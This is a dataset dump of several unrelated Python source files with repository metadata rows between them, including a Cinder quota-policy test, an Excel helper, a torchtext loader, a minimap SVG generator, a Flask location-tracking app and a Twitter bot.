    # Personas expected to be allowed to read quota sets under legacy defaults.
    authorized_users = [
        'legacy_admin',
        'legacy_owner',
        'system_admin',
        'project_admin',
        'project_member',
        'project_reader',
        'project_foo',
    ]
    unauthorized_users = [
        'system_member',
        'system_reader',
        'system_foo',
        'other_project_member',
        'other_project_reader',
    ]
    # Personas expected to be allowed to modify/delete quota sets (admin-only).
    authorized_admins = [
        'legacy_admin',
        'system_admin',
        'project_admin',
    ]
    unauthorized_admins = [
        'legacy_owner',
        'system_member',
        'system_reader',
        'system_foo',
        'project_member',
        'project_reader',
        'project_foo',
        'other_project_member',
        'other_project_reader',
    ]
    # No persona is expected to raise instead of being denied.
    unauthorized_exceptions = []
    # Basic policy test is without enforcing scope (which cinder doesn't
    # yet support) and deprecated rules enabled.
    def setUp(self, enforce_scope=False, enforce_new_defaults=False,
              *args, **kwargs):
        super().setUp(enforce_scope, enforce_new_defaults, *args, **kwargs)
        self.controller = quotas.QuotaSetsController()
        self.api_path = '/v3/os-quota-sets'
        self.api_version = mv.BASE_VERSION
    @ddt.data(*base.all_users)
    def test_show_policy(self, user_id):
        """GET quota set: any project persona may read under legacy rules."""
        rule_name = policy.SHOW_POLICY
        req = fake_api.HTTPRequest.blank(self.api_path,
                                         version=self.api_version)
        self.common_policy_check(user_id, self.authorized_users,
                                 self.unauthorized_users,
                                 self.unauthorized_exceptions,
                                 rule_name, self.controller.show,
                                 req, id=self.project_id)
    @ddt.data(*base.all_users)
    def test_update_policy(self, user_id):
        """PUT quota set: admin-only operation."""
        rule_name = policy.UPDATE_POLICY
        req = fake_api.HTTPRequest.blank(self.api_path,
                                         version=self.api_version)
        req.method = 'PUT'
        body = {
            "quota_set": {
                "groups": 11,
                "volumes": 5,
                "backups": 4
            }
        }
        self.common_policy_check(user_id, self.authorized_admins,
                                 self.unauthorized_admins,
                                 self.unauthorized_exceptions,
                                 rule_name, self.controller.update,
                                 req, id=self.project_id, body=body)
    @ddt.data(*base.all_users)
    def test_delete_policy(self, user_id):
        """DELETE quota set: admin-only operation."""
        rule_name = policy.DELETE_POLICY
        req = fake_api.HTTPRequest.blank(self.api_path,
                                         version=self.api_version)
        req.method = 'DELETE'
        self.common_policy_check(user_id, self.authorized_admins,
                                 self.unauthorized_admins,
                                 self.unauthorized_exceptions,
                                 rule_name, self.controller.delete,
                                 req, id=self.project_id)
class QuotasPolicySecureRbacTest(QuotasPolicyTest):
    """Same checks with secure-RBAC defaults (deprecated rules disabled)."""
    authorized_users = [
        'legacy_admin',
        'system_admin',
        'project_admin',
        'project_member',
        'project_reader',
    ]
    unauthorized_users = [
        'legacy_owner',
        'system_member',
        'system_foo',
        'project_foo',
        'other_project_member',
        'other_project_reader',
    ]
    # NOTE(Xena): The authorized_admins and unauthorized_admins are the same
    # as the QuotasPolicyTest's. This is because in Xena the "admin only"
    # rules are the legacy RULE_ADMIN_API. This will change in Yoga, when
    # RULE_ADMIN_API will be deprecated in favor of the SYSTEM_ADMIN rule that
    # is scope based.
    def setUp(self, *args, **kwargs):
        # Test secure RBAC by disabling deprecated policy rules (scope
        # is still not enabled).
        super().setUp(enforce_scope=False, enforce_new_defaults=True,
                      *args, **kwargs)
| 33.797297 | 78 | 0.595162 |
aafe6ad15866307b4277788796934306b2fe5812 | 2,207 | py | Python | build/lib/like_spider/excel.py | wuyingjie1002/like_spider | 379354a362a693d45513aee4a8d871e79d7f8de4 | [
"MIT"
] | 3 | 2019-02-23T08:19:41.000Z | 2021-01-07T08:05:29.000Z | build/lib/like_spider/excel.py | wuyingjie1002/like_spider | 379354a362a693d45513aee4a8d871e79d7f8de4 | [
"MIT"
] | null | null | null | build/lib/like_spider/excel.py | wuyingjie1002/like_spider | 379354a362a693d45513aee4a8d871e79d7f8de4 | [
"MIT"
] | 1 | 2019-02-23T08:19:43.000Z | 2019-02-23T08:19:43.000Z | import time, os
from openpyxl import load_workbook
from openpyxl import Workbook
from .config import *
class Excel():
    """This is a class that saves data to an excel file."""
    def loadFile(self, fileName):
        """load excel file"""
        self.wb = load_workbook(fileName)
        # NOTE(review): get_sheet_names() is deprecated in newer openpyxl
        # (wb.sheetnames is the replacement) - confirm the pinned version.
        self.sheets = self.wb.get_sheet_names()
    def loadSheet(self, sheet):
        """load a sheet"""
        self.table = self.wb[sheet]
        self.rows = self.table.max_row
        self.cols = self.table.max_column
    def getValue(self, row, col):
        """get a value"""
        # 1-based row/column indexes, as in openpyxl.
        return self.table.cell(row, col).value
    def saveFile(self, data, fileName):
        """save data to an excel file."""
        if fileName == "":
            print('file error')
            return False
        totalRow = len(data)
        if totalRow > 0:
            wb = Workbook()
            ws = wb.active
            for row in range(1, (totalRow + 1)):
                totalCol = len(data[(row - 1)])
                if totalCol > 0:
                    for col in range(1, (totalCol + 1)):
                        cell = ws.cell(row = row, column = col)
                        cell.value = data[(row - 1)][(col - 1)]
                else:
                    # An empty row aborts the write loop...
                    print('col data error')
                    break
            # ...and the workbook is only saved when the last processed row
            # had at least one column.
            if totalCol > 0:
                wb.save(fileName)
        else:
            print('row data error')
    def appendFile(self, data, fileName, sheet = ''):
        """append data to an excel file."""
        if fileName == "":
            print('file error')
            return False
        if os.path.exists(fileName):
            # Prepend the existing sheet contents so saveFile() rewrites
            # everything: old rows first, then the new data.
            self.loadFile(fileName)
            if sheet == '':
                sheet = self.sheets[0]
            self.loadSheet(sheet)
            if self.rows > 0 and self.cols > 0:
                fileData = []
                for row in range(1, self.rows + 1):
                    rowData = []
                    for col in range(1, self.cols + 1):
                        rowData.append(self.getValue(row, col))
                    fileData.append(rowData)
                fileData.extend(data)
                data = fileData
        self.saveFile(data, fileName)
aafefeb23bc5b42fc6c15fe4bf23b8763287d5b4 | 357 | py | Python | carbontracker/predictor.py | leondz/carbontracker | f8b4542f4a0f803d053401b53a3cc367281b31a9 | [
"MIT"
] | 186 | 2020-05-02T20:51:48.000Z | 2022-03-30T09:33:44.000Z | carbontracker/predictor.py | johnjdailey/carbontracker | 1c9307b5fc2a408667f3a19c12c2b45be08354b2 | [
"MIT"
] | 43 | 2020-05-10T12:44:26.000Z | 2022-03-09T11:12:11.000Z | carbontracker/predictor.py | johnjdailey/carbontracker | 1c9307b5fc2a408667f3a19c12c2b45be08354b2 | [
"MIT"
] | 10 | 2020-05-04T11:20:04.000Z | 2022-02-16T03:02:39.000Z | import numpy as np
# TODO: Do advanced prediction based on profiling work.
def predict_energy(total_epochs, epoch_energy_usages):
avg_epoch_energy = np.mean(epoch_energy_usages)
return total_epochs * avg_epoch_energy
def predict_time(total_epochs, epoch_times):
avg_epoch_time = np.mean(epoch_times)
return total_epochs * avg_epoch_time
| 27.461538 | 55 | 0.792717 |
c900a339bfb670f70e69fd6eb2b9f7f8d65dd5a7 | 946 | py | Python | city_scrapers/spiders/det_downtown_development_authority.py | just-hugo/city-scrapers-det | 76b52f11506c99e19b7fcaf135cc7570257a2b62 | [
"MIT"
] | 1 | 2020-10-01T18:27:59.000Z | 2020-10-01T18:27:59.000Z | city_scrapers/spiders/det_downtown_development_authority.py | just-hugo/city-scrapers-det | 76b52f11506c99e19b7fcaf135cc7570257a2b62 | [
"MIT"
] | 9 | 2019-11-30T21:33:24.000Z | 2021-04-07T19:26:47.000Z | city_scrapers/spiders/det_downtown_development_authority.py | just-hugo/city-scrapers-det | 76b52f11506c99e19b7fcaf135cc7570257a2b62 | [
"MIT"
] | 5 | 2019-12-20T17:29:10.000Z | 2021-02-14T01:32:26.000Z | from city_scrapers_core.constants import BOARD
from city_scrapers_core.spiders import CityScrapersSpider
from city_scrapers.mixins import DetAuthorityMixin
class DetDowntownDevelopmentAuthoritySpider(DetAuthorityMixin, CityScrapersSpider):
name = "det_downtown_development_authority"
agency = "Detroit Downtown Development Authority"
agency_url = "https://www.degc.org/dda/"
title = "Board of Directors"
tab_title = "DDA"
classification = BOARD
location = {
"name": "DEGC, Guardian Building",
"address": "500 Griswold St, Suite 2200, Detroit, MI 48226",
}
def _parse_title(self, meeting):
link_text = " ".join([l["title"] for l in meeting["links"]])
if "committee" in link_text.lower():
return "{} Committee".format(
link_text.upper().split(" COMMITTEE")[0]
).replace("DDA ", "")
else:
return "Board of Directors"
| 35.037037 | 83 | 0.663848 |
c90218f051fff4ea8d9d74263bd6864628d0ed69 | 2,172 | py | Python | code/parsing/parsing_args.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | 1 | 2020-06-20T12:27:11.000Z | 2020-06-20T12:27:11.000Z | code/parsing/parsing_args.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | code/parsing/parsing_args.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | from common.bert_args import BertArgs
from sutime import SUTime
from parsing.nltk_nlp_utils import NLTK_NLP
from common import globals_args
from common import hand_files
parser_mode = globals_args.parser_mode
wh_words_set = {"what", "which", "whom", "who", "when", "where", "why", "how", "how many", "how large", "how big"}
bert_args = BertArgs(globals_args.root, globals_args.q_mode)
nltk_nlp = NLTK_NLP(globals_args.argument_parser.ip_port)
sutime = SUTime(jars=globals_args.argument_parser.sutime_jar_files, mark_time_ranges=True)
unimportantwords = hand_files.read_set(globals_args.argument_parser.unimportantwords)
unimportantphrases = hand_files.read_list(globals_args.argument_parser.unimportantphrases)
stopwords_dict = hand_files.read_set(globals_args.argument_parser.stopwords_dir)
ordinal_lines_dict = hand_files.read_ordinal_file(globals_args.argument_parser.ordinal_fengli) #2 {'second', '2ndis_equal_wh_word'}
count_phrases = ['Count', 'How many', 'how many', 'the number of', 'the count of', 'the amount of', 'total number of', 'count']
count_ner_tags = ['count']
dayu_phrases = ['more', 'more than' ,'greater', 'higher', 'longer than', 'taller than'] #'over',
dayu_dengyu_phrases = ['at least', 'not less than', 'or more']
# dengyu_phrases = ['equal', 'same']
xiaoyu_phrases = ['earlier', 'less than', 'smaller', 'less', 'no higher than', 'fewer', 'fewer than']
xiaoyu_dengyu_phrases = ['at most', 'maximum', 'or less', 'no larger than']
comparative_ner_tags = ['>', '>=', '<', '<=']
argmin_phrases = ['smallest', 'least', 'weakest', 'minimum', 'minimal', 'youngest',
'closest', 'shortest', 'thinnest','tiniest','hollowest',
'narrowest','shallowest','simplest','latest','last','poorest','littlest']
argmax_phrases = ['largest', 'brightest', 'heaviest', 'most',
'most', 'maximum', 'maximal', 'ultimate', 'totally', 'hugest',
'longest', 'biggest', 'fattest', 'fastest',
'greatest', 'quickest', 'tallest', 'oldest',
'eldest', 'heaviest', 'farthest', 'furthest', 'richest', 'best']
arg_ner_tags = ['argmax', 'argmin'] | 65.818182 | 133 | 0.683702 |
c90237976b3a9200b3841c1dddf956cf22c21271 | 1,378 | py | Python | torchtext/datasets/amazonreviewfull.py | parmeet/text | 1fb2aedb48b5ecc5e81741e7c8504486b91655c6 | [
"BSD-3-Clause"
] | 3,172 | 2017-01-18T19:47:03.000Z | 2022-03-27T17:06:03.000Z | torchtext/datasets/amazonreviewfull.py | parmeet/text | 1fb2aedb48b5ecc5e81741e7c8504486b91655c6 | [
"BSD-3-Clause"
] | 1,228 | 2017-01-18T20:09:16.000Z | 2022-03-31T04:42:35.000Z | torchtext/datasets/amazonreviewfull.py | parmeet/text | 1fb2aedb48b5ecc5e81741e7c8504486b91655c6 | [
"BSD-3-Clause"
] | 850 | 2017-01-19T03:19:54.000Z | 2022-03-29T15:29:52.000Z | from torchtext.data.datasets_utils import (
_RawTextIterableDataset,
_wrap_split_argument,
_add_docstring_header,
_download_extract_validate,
_create_dataset_directory,
_create_data_from_csv,
)
import os
import logging
URL = 'https://drive.google.com/uc?export=download&id=0Bz8a_Dbh9QhbZVhsUnRWRDhETzA'
MD5 = '57d28bd5d930e772930baddf36641c7c'
NUM_LINES = {
'train': 3000000,
'test': 650000,
}
_PATH = 'amazon_review_full_csv.tar.gz'
_EXTRACTED_FILES = {
'train': f'{os.sep}'.join(['amazon_review_full_csv', 'train.csv']),
'test': f'{os.sep}'.join(['amazon_review_full_csv', 'test.csv']),
}
_EXTRACTED_FILES_MD5 = {
'train': "31b268b09fd794e0ca5a1f59a0358677",
'test': "0f1e78ab60f625f2a30eab6810ef987c"
}
DATASET_NAME = "AmazonReviewFull"
@_add_docstring_header(num_lines=NUM_LINES, num_classes=5)
@_create_dataset_directory(dataset_name=DATASET_NAME)
@_wrap_split_argument(('train', 'test'))
def AmazonReviewFull(root, split):
path = _download_extract_validate(root, URL, MD5, os.path.join(root, _PATH), os.path.join(root, _EXTRACTED_FILES[split]),
_EXTRACTED_FILES_MD5[split], hash_type="md5")
logging.info('Creating {} data'.format(split))
return _RawTextIterableDataset(DATASET_NAME, NUM_LINES[split],
_create_data_from_csv(path))
| 30.622222 | 125 | 0.716255 |
c90243bd480bf830b8eea8819352fe119d1a48da | 2,962 | py | Python | code/examples/VsevolodTymofyeyev/example.py | TrackerSB/MasterThesis | 2792203d28d6c7b62f54545344ee6772d2ec5b64 | [
"MIT"
] | null | null | null | code/examples/VsevolodTymofyeyev/example.py | TrackerSB/MasterThesis | 2792203d28d6c7b62f54545344ee6772d2ec5b64 | [
"MIT"
] | null | null | null | code/examples/VsevolodTymofyeyev/example.py | TrackerSB/MasterThesis | 2792203d28d6c7b62f54545344ee6772d2ec5b64 | [
"MIT"
] | null | null | null | import os
from threading import Thread
from typing import List
from aiExchangeMessages_pb2 import SimulationID
def _handle_vehicle(sid: SimulationID, vid: str, requests: List[str]) -> None:
vid_obj = VehicleID()
vid_obj.vid = vid
i = 0
while i < 10:
i += 1
print(sid.sid + ": Test status: " + service.get_status(sid))
print(vid + ": Wait")
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
if sim_state is SimStateResponse.SimState.RUNNING:
print(vid + ": Request data")
request = DataRequest()
request.request_ids.extend(requests)
data = service.request_data(sid, vid_obj, request) # request()
print(data)
print(vid + ": Wait for control")
control = Control()
while not is_pressed("space"): # Wait for the user to trigger manual drive
pass
print(vid + ": Control")
if is_pressed("s"):
control.simCommand.command = Control.SimCommand.Command.SUCCEED
elif is_pressed("f"):
control.simCommand.command = Control.SimCommand.Command.FAIL
elif is_pressed("c"):
control.simCommand.command = Control.SimCommand.Command.CANCEL
else:
accelerate = 0
steer = 0
brake = 0
if is_pressed("up"):
accelerate = 1
if is_pressed("down"):
brake = 1
if is_pressed("right"):
steer = steer + 1
if is_pressed("left"):
steer = steer - 1
control.avCommand.accelerate = accelerate
control.avCommand.steer = steer
control.avCommand.brake = brake
service.control(sid, vid_obj, control) # control()
else:
print(sid.sid + ": The simulation is not running anymore (State: "
+ SimStateResponse.SimState.Name(sim_state) + ").")
print(sid.sid + ": Final result: " + service.get_result(sid))
break
control = Control()
control.simCommand.command = Control.SimCommand.Command.FAIL
service.control(sid, vid_obj, control)
if __name__ == "__main__":
from AIExchangeService import get_service
from aiExchangeMessages_pb2 import SimStateResponse, Control, SimulationID, VehicleID, DataRequest
from keyboard import is_pressed
service = get_service()
# Send tests
sids = service.run_tests("test", "test", "envs/criteriaA.dbc.xml", "envs/environmentA.dbe.xml")
# Interact with a simulation
if not sids:
exit(1)
sid = SimulationID()
sid.sid = sids.sids[0]
ego_requests = ["egoSpeed"]
ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "ego", ego_requests))
ego_vehicle.start()
ego_vehicle.join()
| 36.121951 | 102 | 0.581702 |
c903dd831993098c836cb5e931cb47ef98a3829d | 4,869 | py | Python | python/aocrecs/logic/minimap.py | Rotzbua/aocrecs.com | 2f03ece75e7367a99e5f36874727cd5bb90508f7 | [
"MIT"
] | 7 | 2019-10-08T09:04:48.000Z | 2021-02-06T00:05:53.000Z | python/aocrecs/logic/minimap.py | happyleavesaoc/aocrecs.com | 2f03ece75e7367a99e5f36874727cd5bb90508f7 | [
"MIT"
] | 10 | 2020-01-18T22:14:09.000Z | 2021-07-31T21:43:05.000Z | python/aocrecs/logic/minimap.py | happyleavesaoc/aocrecs.com | 2f03ece75e7367a99e5f36874727cd5bb90508f7 | [
"MIT"
] | 5 | 2020-05-08T11:35:14.000Z | 2022-01-16T12:41:57.000Z | """Generate SVG minimap."""
from aioify import wrap as aiowrap
from subprocess import Popen, PIPE
import math
import xml.etree.ElementTree as ET
from aocrecs.consts import PREDATOR_IDS, HERDABLE_IDS, HUNT_IDS, BOAR_IDS, FISH_IDS, FORAGE_ID, TC_IDS
GOLD_COLOR = '#FFC700'
STONE_COLOR = '#919191'
FOOD_COLOR = '#A5C46C'
RELIC_COLOR = '#FFFFFF'
CONSTANT_COLORS = [GOLD_COLOR, STONE_COLOR, FOOD_COLOR, RELIC_COLOR]
FOOD_IDS = PREDATOR_IDS + HERDABLE_IDS + HUNT_IDS + BOAR_IDS + FISH_IDS + [FORAGE_ID]
GOLD_ID = 66
STONE_ID = 102
RELIC_ID = 285
OBJECT_MAPPING = [
([GOLD_ID], GOLD_COLOR),
([STONE_ID], STONE_COLOR),
(FOOD_IDS, FOOD_COLOR),
([RELIC_ID], RELIC_COLOR)
]
NAMESPACE = 'http://www.w3.org/2000/svg'
def make_pbm(data, dimension, multiplier):
    """Produce PBM file contents: a plain-text P1 bitmap upscaled by *multiplier*."""
    size = dimension * multiplier
    header = 'P1\n{} {}\n'.format(size, size)
    scaled_rows = []
    for row in data:
        # Repeat each cell horizontally, then the whole row vertically.
        wide_row = ''.join(cell * multiplier for cell in row)
        scaled_rows.append(wide_row * multiplier)
    return (header + ''.join(scaled_rows)).encode()
def new_canvas(dimension, value='0'):
    """Produce a blank canvas: a dimension x dimension grid of *value* cells."""
    # Build each row independently so mutating one row never affects another.
    return [[value for _ in range(dimension)] for _ in range(dimension)]
def get_slope(tiles, dimension, i):
    """Compute tile slope ('level', 'up' or 'down') from diagonal neighbours.

    A tile slopes 'up' when a northern diagonal neighbour (nw/ne) is higher
    and 'down' when a southern one (se/sw) is higher; 'down' wins when both
    apply. Neighbours outside the map count as level ground, which fixes the
    former negative-index wraparound on edge tiles (the old TODO).
    """
    total = dimension * dimension
    elevation = tiles[i]['elevation']
    def neighbour_elevation(offset):
        # Out-of-bounds neighbours return the tile's own elevation so they
        # never influence the slope (previously negative indexes wrapped to
        # the opposite side of the map).
        j = i + offset
        if 0 <= j < total:
            return tiles[j]['elevation']
        return elevation
    slope = 'level'
    if (neighbour_elevation(-dimension - 1) > elevation
            or neighbour_elevation(-dimension + 1) > elevation):
        slope = 'up'
    if (neighbour_elevation(dimension + 1) > elevation
            or neighbour_elevation(dimension - 1) > elevation):
        slope = 'down'
    return slope
def trace(layers, dimension, corners, squareness, scale):
    """Trace map layers into a single SVG string.

    Each colour layer is rasterized to PBM, vectorized with the external
    `potrace` binary, and appended to a shared group whose rotate(-45)
    transform turns the square map into the diamond minimap orientation.
    """
    # Normalize the scale: the bitmap handed to potrace is upscaled by
    # `squareness` and is `dimension` tiles wide.
    scale /= squareness
    scale /= dimension
    # Half the diagonal of the scaled square, used to center the rotated map.
    translate = math.sqrt(((dimension * squareness * scale)**2) * 2)/2.0
    ET.register_namespace('', NAMESPACE)
    svg = ET.Element('svg', attrib={
        'viewBox': '0 0 {} {}'.format(translate * 2, translate),
    })
    transform = ET.SubElement(svg, 'g', attrib={
        'transform': 'translate({}, {}) scale({}, {}) rotate(-45)'.format(0, translate/2, scale, scale/2)
    })
    # The potrace invocation is loop-invariant: build it once.
    args = ['potrace', '-s', '-a', str(corners)]
    for color, canvas in layers.items():
        xml = ET.fromstring(Popen(
            args, stdout=PIPE, stdin=PIPE, stderr=PIPE
        ).communicate(input=make_pbm(canvas, dimension, squareness))[0].decode('ascii'))
        layer = xml.find('{' + NAMESPACE + '}g')
        layer.set('fill', color)
        for path in layer.findall('{' + NAMESPACE + '}path'):
            path.set('stroke', color)
            path.set('stroke-width', str(10))
        transform.append(layer)
    return ET.tostring(svg, encoding='unicode')
@aiowrap
def generate_svg(tiles, dimension, terrain, objects, player_colors, corners=0, squareness=3, scale=1000):  # pylint: disable=too-many-arguments
    """Generate map SVG.

    Rasterizes terrain, player objects and neutral resources into per-colour
    monochrome layers, then vectorizes them via trace(). Leftover debug
    instrumentation (write-only counters and commented prints) was removed.
    """
    layers = {}
    # Terrain: one layer per resolved colour (terrain id + slope shading).
    for i, tile in enumerate(tiles):
        color = terrain[tile['terrain_id']][get_slope(tiles, dimension, i)]
        if color not in layers:
            layers[color] = new_canvas(dimension)
        layers[color][tile['y']][tile['x']] = '1'
    # Dedicated layers for player colours and the fixed resource colours.
    for color in list(player_colors.values()) + CONSTANT_COLORS:
        layers[color] = new_canvas(dimension)
    for obj in objects:
        if obj['player_number'] is not None and obj['class_id'] in [70, 80]:
            color = player_colors[obj['player_number']]
            layers[color][int(obj['y'])][int(obj['x'])] = '1'
            if obj['object_id'] in TC_IDS:
                # Town centers render as a 3x3 block.
                for i in range(-1, 2):
                    for j in range(-1, 2):
                        layers[color][int(obj['y']) + i][int(obj['x']) + j] = '1'
            elif obj['object_id'] in [88, 793]:
                # Vertical 3x1 footprint - confirm which object ids these are.
                for i in range(-1, 2):
                    layers[color][int(obj['y']) + i][int(obj['x'])] = '1'
            elif obj['object_id'] in [64, 789]:
                # Horizontal 1x3 footprint.
                for i in range(-1, 2):
                    layers[color][int(obj['y'])][int(obj['x']) + i] = '1'
        else:
            # Neutral objects: gold, stone, food and relics (OBJECT_MAPPING).
            for object_ids, color in OBJECT_MAPPING:
                if obj['object_id'] in object_ids:
                    layers[color][int(obj['y'])][int(obj['x'])] = '1'
                    break
    return trace(layers, dimension, corners, squareness, scale)
| 36.609023 | 142 | 0.59047 |
c9050ca554b19fd1e3228026b793070703e19ae1 | 150 | py | Python | NewspaperSpider/NewspaperSpider/items.py | sidharthk9/NewspaperScraper | 9a8d608c55cc6fdfa6492d2ca58739066d65b16e | [
"Unlicense"
] | null | null | null | NewspaperSpider/NewspaperSpider/items.py | sidharthk9/NewspaperScraper | 9a8d608c55cc6fdfa6492d2ca58739066d65b16e | [
"Unlicense"
] | null | null | null | NewspaperSpider/NewspaperSpider/items.py | sidharthk9/NewspaperScraper | 9a8d608c55cc6fdfa6492d2ca58739066d65b16e | [
"Unlicense"
] | null | null | null | import scrapy
from scrapy.item import Field
class TitleItem(scrapy.Item):
    """Scraped item carrying an article headline."""
    heading = Field()  # headline text of a scraped article
class LinkItem(scrapy.Item):
    """Scraped item carrying a link to an article."""
    article = Field()  # URL (or link payload) of a scraped article
c90520de032ac5944e1b5e55e1cdb770212939a5 | 3,526 | py | Python | Application/views.py | gdimitris/FleetManagerBackend | 1a5f0c26a4279894b6ed6507cf729f88502d0883 | [
"MIT"
] | null | null | null | Application/views.py | gdimitris/FleetManagerBackend | 1a5f0c26a4279894b6ed6507cf729f88502d0883 | [
"MIT"
] | null | null | null | Application/views.py | gdimitris/FleetManagerBackend | 1a5f0c26a4279894b6ed6507cf729f88502d0883 | [
"MIT"
] | 1 | 2020-05-05T05:42:00.000Z | 2020-05-05T05:42:00.000Z | import os
from datetime import datetime
from flask import render_template, request, jsonify, send_from_directory, url_for
from Application import app, db
from Application.db_operations import update_researcher_timestamp, insert_location_point_in_db, \
insert_or_update_existing_researcher, get_all_researchers_from_db, get_entries_with_phone_id, \
get_filtered_entries_from_db, get_locations_for_phone_ids
@app.errorhandler(404)
def not_found(error):
    """Log the unknown path and render the generic error page (HTTP 404)."""
    message = "Page not found: %s \n Reason: %s" % (request.path, error)
    app.logger.error(str(message))
    return render_template('error.html', message=message), 404
@app.errorhandler(500)
@app.errorhandler(502)
def internal_error(error):
    """Roll back any pending DB transaction, log, and render the error page (500/502)."""
    # Rollback avoids leaving the SQLAlchemy session in a broken state.
    db.session.rollback()
    message = "Internal server error: %s" % error
    app.logger.error(message)
    return render_template('error.html', message=message), 500
@app.errorhandler(Exception)
def unhandled_exception(e):
    """Catch-all handler: roll back the DB session and render the error page."""
    db.session.rollback()
    message = "Unhandled exception: %s" % e
    app.logger.error(message)
    return render_template('error.html', message=message), 500
@app.route('/content/current_version.apk', methods=['GET'])
def get_apk():
    """Serve the bundled Android APK with the correct package MIME type."""
    return send_from_directory(os.path.join(app.root_path, 'static/resources'), 'app-working.apk',
                               mimetype='application/vnd.android.package-archive')
@app.route('/json/current_apk_version', methods=['GET'])
def get_version():
    """Return the current APK version string and its download URL as JSON."""
    # Context manager guarantees the file handle is closed; the original
    # opened the file and never closed it.
    with open('static/resources/current_apk_version.txt') as text_file:
        version = text_file.readline()
    apk_url = url_for('get_apk', _external=True)
    return jsonify(version=version, url=apk_url)
@app.route('/', methods=['GET', 'POST'])
def root():
    """Landing page: list all registered researchers."""
    researchers = get_all_researchers_from_db()
    return render_template('users.html', researchers=researchers)
@app.route('/<device_id>', methods=['GET'])
def show_device_locations(device_id):
    """Render the location-view page for one device."""
    return render_template('index.html', device_id=device_id)
@app.route('/<device_id>', methods=['POST'])
def add_entry(device_id):
    """Store one GPS point for a device and refresh the researcher timestamp.

    Expects 'lat', 'lon' and 'time' (unix seconds) query parameters.
    """
    lat = request.args.get('lat')
    lon = request.args.get('lon')
    timestamp = request.args.get('time')
    # fromtimestamp() is a classmethod; the original called it on a
    # throwaway datetime.now() instance. Call it on the class directly.
    time = datetime.fromtimestamp(float(timestamp))
    insert_location_point_in_db(device_id, lat, lon, time)
    update_researcher_timestamp(device_id, time)
    return render_template("empty.html"), 200
@app.route('/json/<device_id>', methods=['GET'])
def get_entries(device_id):
    """Return all stored location points for a device as JSON."""
    entries = get_entries_with_phone_id(device_id)
    return jsonify(result=entries)
@app.route('/json/<device_id>/filtered', methods=['GET'])
def get_filtered_entries(device_id):
    """Return a device's location points within a time window.

    Expects 'start' and 'end' query parameters (presumably unix
    timestamps — confirm against the DB helper).
    """
    start_unix_time = request.args.get('start')
    end_unix_time = request.args.get('end')
    entries = get_filtered_entries_from_db(device_id, start_unix_time, end_unix_time)
    return jsonify(result=entries)
@app.route('/<device_id>/register_full_name', methods=['GET', 'POST'])
def register_researcher(device_id):
    """Create or update the researcher record tied to a device id.

    Expects 'name' and 'surname' query parameters.
    """
    name = request.args.get('name')
    surname = request.args.get('surname')
    insert_or_update_existing_researcher(device_id, name, surname)
    return render_template("empty.html"), 200
@app.route('/multiselect_users', methods=['POST'])
def multiselect_users():
    """Render combined location data for the researchers checked in the form."""
    selected = request.form.getlist("check")
    # Replace the Python-2-only `print "..."` statements with the app
    # logger (lazy %-formatting, works on both Python 2 and 3).
    app.logger.info("Selected researchers (%d): %s", len(selected), selected)
    res = get_locations_for_phone_ids(selected)
    entries = jsonify(locations=res)
    return render_template("multiple_users.html", result=entries.data)
if __name__ == '__main__':
    # Run the Flask development server when executed directly.
    app.run()
| 33.903846 | 99 | 0.731707 |
c905ade7488a7156992eba8440fe0b587bb04770 | 347 | py | Python | app/app.py | JulesGrd/Twitter-Dog-Bot | d0b8a12afbf7ca1c42c540032d1ad9ff5681701b | [
"MIT"
] | 2 | 2021-10-08T21:43:44.000Z | 2021-10-08T22:19:22.000Z | app/app.py | JulesGrd/Twitter-Dog-Bot | d0b8a12afbf7ca1c42c540032d1ad9ff5681701b | [
"MIT"
] | 1 | 2021-11-07T20:07:53.000Z | 2021-11-07T20:07:53.000Z | app/app.py | JulesGrd/Twitter-Dog-Bot | d0b8a12afbf7ca1c42c540032d1ad9ff5681701b | [
"MIT"
] | 1 | 2021-11-07T18:05:19.000Z | 2021-11-07T18:05:19.000Z | import tweepy
import dog
from postDog import postDog
from config import data
if __name__ == '__main__':
    # Authenticate against the Twitter API with the OAuth credentials
    # from config.data, fetch a dog picture, then post it.
    auth = tweepy.OAuthHandler(data["OAUTH_HANDLER_1"], data["OAUTH_HANDLER_2"])
    auth.set_access_token(data["API_KEY_1"], data["API_KEY_2"])
    api = tweepy.API(auth)
    # NOTE(review): the return value is unused by postDog — presumably
    # getDog's side effect is saving the picture to 'assets/doggy'; confirm.
    dogPic = dog.getDog(filename='assets/doggy')
    postDog(api)
| 21.6875 | 80 | 0.717579 |
c906663e816567788a872d79ad4e2f03fb4244fb | 12,019 | py | Python | python/loom_viewer/loom_cli.py | arao11/pattern_viz | 3123f19a127c9775fadcca25f83aebfc8dc3b9f9 | [
"BSD-2-Clause"
] | 34 | 2017-10-18T06:09:16.000Z | 2022-03-21T18:53:16.000Z | python/loom_viewer/loom_cli.py | arao11/pattern_viz | 3123f19a127c9775fadcca25f83aebfc8dc3b9f9 | [
"BSD-2-Clause"
] | 52 | 2017-10-19T13:35:39.000Z | 2021-06-03T08:54:55.000Z | python/loom_viewer/loom_cli.py | arao11/pattern_viz | 3123f19a127c9775fadcca25f83aebfc8dc3b9f9 | [
"BSD-2-Clause"
] | 6 | 2018-05-28T06:16:26.000Z | 2020-08-17T11:49:34.000Z | #!/usr/bin/env python
# Copyright (c) 2016 Sten Linnarsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
